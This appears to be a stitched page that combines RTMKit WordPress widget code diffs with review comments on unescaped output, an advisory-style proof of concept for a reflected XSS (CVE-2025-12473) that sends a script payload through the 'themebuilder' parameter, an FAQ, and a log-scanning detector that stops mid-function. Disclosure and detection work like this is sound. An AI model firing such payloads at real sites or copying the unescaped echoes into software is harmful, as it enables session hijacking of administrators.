+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header:hover' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'accordion_box_shadow_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->end_controls_tabs();
+
+ $this->add_control(
+ 'title_more_options',
+ [
+ 'label' => esc_html__('Sub Title', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::HEADING,
+ 'separator' => 'before',
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Typography::get_type(),
+ [
+ 'name' => 'subtitle_typography',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header-text .header-subtitle',
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]
+ );
+
+ $this->add_control('content_subheading_color', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header-text .header-subtitle' => 'color:{{VALUE}}'
+ ],
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]);
+
+ $this->add_responsive_control(
+ 'content_subheading_padding',
+ [
+ 'label' => esc_html__('Padding', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header-text .header-subtitle' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('icon_style', [
+ 'label' => esc_html('Toggle Icon'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'icon_size',
+ [
+ 'label' => esc_html__('Size', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon .icon_open , .rkit-accordion__icon .icon_close' => 'font-size: {{SIZE}}{{UNIT}}; width:{{SIZE}}{{UNIT}} ; height:{{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_width',
+ [
+ 'label' => esc_html__('Box Width', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'width: {{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_height',
+ [
+ 'label' => esc_html__('Box height', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'height: {{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_margin',
+ [
+ 'label' => esc_html__('Margin', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+
+ $this->start_controls_tabs('icon_tabs');
+
+ $this->start_controls_tab('icon_tab_close', ['label' => esc_html('Close')]);
+
+ $this->add_control('icon_color_close', [
+ 'label' => esc_html('Icon Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon .icon_close , .rkit-accordion__icon .icon_open' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'icon_bg_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'icon_background_close',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_control(
+ 'icon_border_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'icon_border_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'icon_box_shadow_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__icon',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('icon_tab_open', ['label' => esc_html('Open')]);
+
+ $this->add_control('icon_color_open', [
+ 'label' => esc_html('Icon Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon .icon_open , .rkit-accordion-item.open .rkit-accordion__icon .icon_close' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'icon_bg_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'icon_background_open',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_control(
+ 'icon_border_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'icon_border_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'icon_box_shadow_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('icon_tab_hover', ['label' => esc_html('Hover')]);
+
+ $this->add_control('icon_color_hover', [
+ 'label' => esc_html('Icon Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon .icon_close , .rkit-accordion-header:hover .rkit-accordion__icon .icon_open' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'icon_bg_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'icon_background_hover',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_control(
+ 'icon_border_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'icon_border_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon',
+ ]
+ );
+
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'icon_box_shadow_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->end_controls_tabs();
+
+ // divider control border radius
+ $this->add_control(
+ 'border_radius_divider',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_radius',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('left_header_icon_style', [
+ 'label' => esc_html('Title Icon'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE,
+ 'condition' => [
+ 'show_heading_icons' => 'yes'
+ ]
+ ]);
+
+ $this->add_responsive_control(
+ 'left_header_icon_size',
+ [
+ 'label' => esc_html__('Size', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-left-header-icon .accordion_header_icon' => 'font-size: {{SIZE}}{{UNIT}}; width:{{SIZE}}{{UNIT}} ; height:{{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_control('left_header_icon_color', [
+ 'label' => esc_html('Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-left-header-icon .accordion_header_icon' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control('left_header_icon_bg_color', [
+ 'label' => esc_html('Background Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header .rkit-left-header-icon' => 'background-color:{{VALUE}};'
+ ]
+ ]);
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('content_style', [
+ 'label' => esc_html('Content'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'content_text_align',
+ [
+ 'label' => esc_html__('Alignment', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'left' => [
+ 'title' => esc_html__('Left', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-left',
+ ],
+ 'center' => [
+ 'title' => esc_html__('Center', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-center',
+ ],
+ 'right' => [
+ 'title' => esc_html__('Right', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-right',
+ ],
+ 'justify' => [
+ 'title' => esc_html__('Justify', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-justify',
+ ],
+ ],
+ 'default' => 'left',
+ 'toggle' => true,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'text-align: {{VALUE}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Typography::get_type(),
+ [
+ 'name' => 'content_typography',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+ $this->add_control('content_color', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_group_control(
+ ElementorGroup_Control_Text_Shadow::get_type(),
+ [
+ 'name' => 'content_text_shadow',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'background',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'border_content',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'content_radius',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'content_padding',
+ [
+ 'label' => esc_html__('Padding', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+ }
+
+ protected function render_edit_template_button($item)
+ {
+ if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+?>
+ <a href="<?php echo admin_url("post.php?post={$item}&action=elementor") ?>"
+ class="accordion-edit-template-btn btn">
+ Edit Saved Template <i class="eicon-edit" aria-hidden="true"></i>
+ </a>
+ <?php
+ }
+ }
+ protected function render()
+ {
+ $settings = $this->get_settings_for_display();
+ $no = 0;
+
+ switch ($settings['title_tag']) {
+ case 'h1':
+ $title_tag = 'h1';
+ break;
+ case 'h2':
+ $title_tag = 'h2';
+ break;
+ case 'h3':
+ $title_tag = 'h3';
+ break;
+ case 'h4':
+ $title_tag = 'h4';
+ break;
+ case 'h5':
+ $title_tag = 'h5';
+ break;
+ case 'h6':
+ $title_tag = 'h6';
+ break;
+ case 'span':
+ $title_tag = 'span';
+ break;
+ case 'div':
+ $title_tag = 'div';
+ break;
+ default:
+ $title_tag = 'h3';
+ break;
+ }
+
+ ?>
+
+ <div class="rkit-accordion">
+ <?php foreach ($settings['list_items'] as $item) : $no = $no + 1; ?>
+ <div class="rkit-accordion-item <?php echo ($item['open_default'] === 'yes') ? 'open' : '' ?>">
+ <div class="rkit-accordion-header">
+ <?php if (!empty($settings['show_heading_icons'])) { ?>
+ <div class="rkit-left-header-icon">
+ <?php ElementorIcons_Manager::render_icon($item['accordion_header_icon'], ['aria-hidden' => 'true', 'class' => 'accordion_header_icon']); ?>
+ </div>
+ <?php } ?>
+ <div class="rkit-accordion-header-text">
+ <<?php echo esc_attr($title_tag) ?> class="rkit-accordion__title">
+ <?php
+ if ($settings['show_loop_count'] === 'yes') {
+ if ($settings['show_zero_padded'] === 'yes') {
+ $padded = str_pad($no, 2, '0', STR_PAD_LEFT);
+ echo esc_html($padded . '. ');
+ } else {
+ echo esc_html($no . '. ');
+ }
+ }
+ echo esc_html($item['accordion_title'])
+ ?>
+ </<?php echo esc_attr($title_tag) ?>>
+ <?php if (!empty($settings['show_subheading'])) { ?>
+ <span class="header-subtitle"><?php echo $item['accordion_sub_title'] ?></span>
+ <?php } ?>
+ </div>
+ <div class="rkit-accordion__icon">
+ <?php ElementorIcons_Manager::render_icon($settings['icon_close'], ['aria-hidden' => 'true', 'class' => 'icon_close']); ?>
+ <?php ElementorIcons_Manager::render_icon($settings['icon_open'], ['aria-hidden' => 'true', 'class' => 'icon_open']); ?>
+ </div>
+ </div>
+ <div class="rkit-accordion-content">
+ <div class="rkit-accordion__content">
+ <?php
+ if ($item['description_type'] == 'description') {
+ echo wp_kses_post($item['item_description']);
+ } else {
+ $template = get_post($item['item_template']);
+ if (!empty($template)) { ?>
+ <div class="rkit-custom-content-wrapper" <?php echo (ElementorPlugin::$instance->editor->is_edit_mode()) ? 'saved-template="true"' : '' ?>>
+ <?php
+ echo RTMKitModulesWidgetsWidgetModule::instance()->render_edit_template_button($item['item_template'], get_queried_object_id());
+ echo ElementorPlugin::instance()->frontend->get_builder_content_for_display($item['item_template']);
+ ?>
+ </div>
+ <?php }
+ }
+ ?>
+ </div>
+ </div>
+ </div>
+ <?php endforeach; ?>
+ </div>
+
+<?php
+ }
+}
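Review bot: in render(), the subtitle is printed unescaped at <span class="header-subtitle"><?php echo $item['accordion_sub_title'] ?></span>, while the title a few lines above goes through esc_html() and the description goes through wp_kses_post(). Wrap the subtitle in esc_html(), or in wp_kses_post() if markup is intended there. The href in render_edit_template_button() has the same gap: the admin_url(...) result is echoed without esc_url(). Separately, in icon_color_open and icon_color_hover the second selector after the comma has no {{WRAPPER}} prefix, so that colour rule is not scoped to this widget instance.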
--- a/rometheme-for-elementor/Inc/Elements/AdvancedHeading.php
+++ b/rometheme-for-elementor/Inc/Elements/AdvancedHeading.php
@@ -0,0 +1,922 @@
+<?php
+
+namespace RTMKitElements;
+
+class AdvancedHeading extends ElementorWidget_Base
+{
+ private function get_widget_data()
+ {
+ return RTMkitModulesWidgetsWidgetStorage::instance()->get_widget_data_by_key('advancedheading');
+ }
+
+ public function get_name()
+ {
+ return 'rkit_advanced_heading';
+ }
+ public function get_title()
+ {
+ return $this->get_widget_data()['name'];
+ }
+
+ public function get_icon()
+ {
+ $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
+ return $icon;
+ }
+
+ public function get_keywords()
+ {
+ return ['rometheme', 'heading', 'animation', 'advanced', 'animation text', ' heading'];
+ }
+
+ function get_custom_help_url()
+ {
+ return 'https://support.rometheme.net/docs/romethemekit/widgets/how-to-use-ezd_ampersand-customize-advanced-heading-widget/';
+ }
+
+ public function get_categories()
+ {
+ return ['romethemekit_widgets'];
+ }
+
+ public function get_style_depends()
+ {
+ return ['rtmkit-element-advanced_heading'];
+ }
+ protected function is_dynamic_content(): bool
+ {
+ return false;
+ }
+ protected function register_controls()
+ {
+ $this->start_controls_section(
+ 'content_section',
+ [
+ 'label' => esc_html__('Content', 'rometheme-kit'),
+ ]
+ );
+
+ $this->add_control(
+ 'text',
+ [
+ 'label' => esc_html__('Text', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::TEXTAREA,
+ 'rows' => 10,
+ 'default' => esc_html__('Example {{Headline Text}} for this {{Faster}} Page', 'rometheme-for-elementor'),
+ 'placeholder' => esc_html__('Type your text here', 'rometheme-for-elementor'),
+ 'description' => esc_html('The {{ }} symbols are used to indicate that the text will be given animation effects. If there are multiple texts, separate them with commas inside the {{ }}.')
+ ]
+ );
+
+ $this->add_control('html_tag', [
+ 'label' => esc_html('HTML Tag'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => [
+ 'h1' => esc_html('H1'),
+ 'h2' => esc_html('H2'),
+ 'h3' => esc_html('H3'),
+ 'h4' => esc_html('H4'),
+ 'h5' => esc_html('H5'),
+ 'h6' => esc_html('H6'),
+ ],
+ 'default' => 'h1'
+ ]);
+
+ $this->add_control(
+ '_link',
+ [
+ 'label' => esc_html__('Link', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::URL,
+ 'placeholder' => esc_html__('https://your-link.com', 'rometheme-for-elementor'),
+ 'options' => ['url', 'is_external', 'nofollow'],
+ 'default' => [
+ 'url' => '',
+ 'is_external' => true,
+ 'nofollow' => true,
+ ],
+ 'label_block' => true,
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('background_text', [
+ 'label' => esc_html('Background Text'),
+ 'tab' => ElementorControls_Manager::TAB_CONTENT
+ ]);
+
+ $this->add_control(
+ 'show_background_text',
+ [
+ 'label' => esc_html__('Use Background Text', 'textdomain'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'textdomain'),
+ 'label_off' => esc_html__('No', 'textdomain'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control('background_text_heading', [
+ 'type' => ElementorControls_Manager::TEXT,
+ 'label' => esc_html('Text'),
+ 'default' => esc_html('Awesome Heading'),
+ 'condition' => [
+ 'show_background_text' => 'yes'
+ ]
+ ]);
+
+ $this->end_controls_section();
+
+ $this->start_controls_section(
+ 'wrapper_style',
+ [
+ 'label' => esc_html__('Wrapper', 'rometheme-kit'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE,
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'alignment',
+ [
+ 'label' => esc_html__('Alignment', 'rometheme-kit'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'left' => [
+ 'title' => esc_html__('Left', 'rometheme-kit'),
+ 'icon' => 'eicon-text-align-left',
+ ],
+ 'center' => [
+ 'title' => esc_html__('Center', 'rometheme-kit'),
+ 'icon' => 'eicon-text-align-center',
+ ],
+ 'right' =
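Review bot: the text domains in register_controls() are inconsistent. The content_section, wrapper_style and alignment strings use 'rometheme-kit', the show_background_text switcher uses the placeholder 'textdomain', and the remaining controls use 'rometheme-for-elementor'. Use one domain throughout so that all strings are picked up by the same translation files. Several labels ('HTML Tag', 'Background Text', 'Text', and the description on the text control) are passed to esc_html() rather than esc_html__(), so they cannot be translated at all. In addition, get_custom_help_url() is declared without a visibility keyword, unlike the surrounding methods, and its URL contains the token 'ezd_ampersand', which looks like a leftover placeholder in the slug and should be checked against the real documentation link.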
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12473 - RTMKit <= 1.6.8 - Reflected Cross-Site Scripting via 'themebuilder' Parameter
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=rtmkit';
$payload = '<script>alert(document.domain)</script>';
// Place the URL-encoded payload in the 'themebuilder' parameter
$exploit_url = $target_url . '&themebuilder=' . urlencode($payload);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 Atomic Edge PoC');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// A verbatim copy of the payload in the body means the value was echoed without escaping
if (strpos($response, $payload) !== false) {
    echo "[+] Vulnerability likely present. Payload found in response.\n";
    echo "[+] Exploit URL: $exploit_url\n";
} else {
    echo "[-] No immediate evidence of vulnerability in response.\n";
}
?>
Frequently Asked Questions
What is CVE-2025-12473?
Understanding the vulnerability
CVE-2025-12473 is a reflected cross-site scripting (XSS) vulnerability found in the RTMKit plugin for WordPress, specifically affecting versions up to and including 1.6.8. The vulnerability arises from insufficient input sanitization and output escaping for the ‘themebuilder’ parameter, allowing attackers to inject arbitrary scripts.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows unauthenticated attackers to craft a malicious URL containing a JavaScript payload in the ‘themebuilder’ parameter. If an administrator clicks on this link, the payload executes in their browser, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the RTMKit plugin version 1.6.8 or earlier is affected by this vulnerability. Site administrators should verify their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, confirm that you are using RTMKit version 1.6.8 or earlier. Additionally, you can test for the vulnerability by attempting to access a crafted URL with the ‘themebuilder’ parameter and observing if the payload executes.
How can I fix or mitigate this issue?
Recommended actions
The recommended fix is to update the RTMKit plugin to version 2.0.0 or later, where the vulnerability has been patched. Always ensure that your plugins are kept up to date to mitigate security risks.
What does the CVSS score of 6.1 indicate?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to the affected systems. Administrators should prioritize addressing this vulnerability to prevent potential exploitation.
What is reflected cross-site scripting?
Explaining the XSS type
Reflected cross-site scripting (XSS) occurs when an attacker sends a malicious script that is reflected off a web server, typically via a URL parameter. When a victim clicks the link, the script executes in their browser, potentially allowing the attacker to steal information or perform actions on behalf of the user.
How does the proof of concept demonstrate the vulnerability?
Exploit illustration
The proof of concept provided shows how an attacker can construct a URL with a script payload in the ‘themebuilder’ parameter. If an administrator accesses this URL, the script executes, confirming the presence of the vulnerability and demonstrating the risk of exploitation.
What are the potential consequences of this vulnerability?
Impact analysis
If exploited, this vulnerability can lead to session hijacking, unauthorized actions performed in the admin area, or even full site compromise. Attackers could deface the site or install malicious plugins, significantly impacting site integrity and security.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the RTMKit plugin until it can be updated. Additionally, review user access controls and educate administrators about the risks of clicking unknown links.
How can I stay informed about similar vulnerabilities?
Keeping up with security updates
To stay informed about vulnerabilities, regularly check security advisories from sources like the WordPress Plugin Repository, CVE databases, and security blogs. Subscribing to security mailing lists can also provide timely updates on new vulnerabilities.
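For sites that cannot update straight away, web server access logs can be reviewed for requests that carry markup in the ‘themebuilder’ parameter, as in the reflected XSS mechanism the FAQ describes. The following is an added example, not part of the original advisory or the plugin's code: it parses combined-format log lines and flags wp-admin requests whose decoded ‘themebuilder’ value contains HTML metacharacters. The log lines are constructed, and the rule that a legitimate value never contains `<`, `>` or quotes is an assumption of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format:
# ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Characters with meaning in HTML text or attribute context.
# Assumption of this example: a legitimate 'themebuilder' value never needs them.
HTML_META = re.compile(r'[<>"\']')

# Constructed log lines for illustration only (documentation IP ranges).
# _ENCODED is the page's PoC payload as PHP urlencode() would emit it.
_ENCODED = "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
SAMPLE_LOG = "\n".join([
    '198.51.100.4 - - [12/Nov/2025:10:01:02 +0000] "GET /wp-admin/admin.php'
    '?page=rtmkit&themebuilder=header HTTP/1.1" 200 5120 '
    '"https://site.example/wp-admin/" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Nov/2025:10:03:44 +0000] "GET /wp-admin/admin.php'
    '?page=rtmkit&themebuilder=' + _ENCODED + ' HTTP/1.1" 200 5303 '
    '"https://mail.example/" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Nov/2025:10:07:10 +0000] "GET /wp-admin/admin.php'
    '?page=rtmkit&themebuilder=' + _ENCODED + ' HTTP/1.1" 302 0 '
    '"-" "Mozilla/5.0 Atomic Edge PoC"',
    'truncated line without request fields',
])


def suspicious_themebuilder_requests(log_text):
    """Return one dict per wp-admin request whose decoded 'themebuilder'
    value contains HTML metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes once, mirroring what PHP places in $_GET.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("themebuilder", []):
            if HTML_META.search(value):
                findings.append({
                    "time": m["time"],
                    "ip": m["ip"],
                    "referer": m["referer"],
                    "agent": m["agent"],
                    "value": value,
                    # WordPress redirects unauthenticated wp-admin requests to
                    # the login page, so a 200 means the admin page was
                    # rendered for a logged-in session: triage these first.
                    "rendered": m["status"] == "200",
                })
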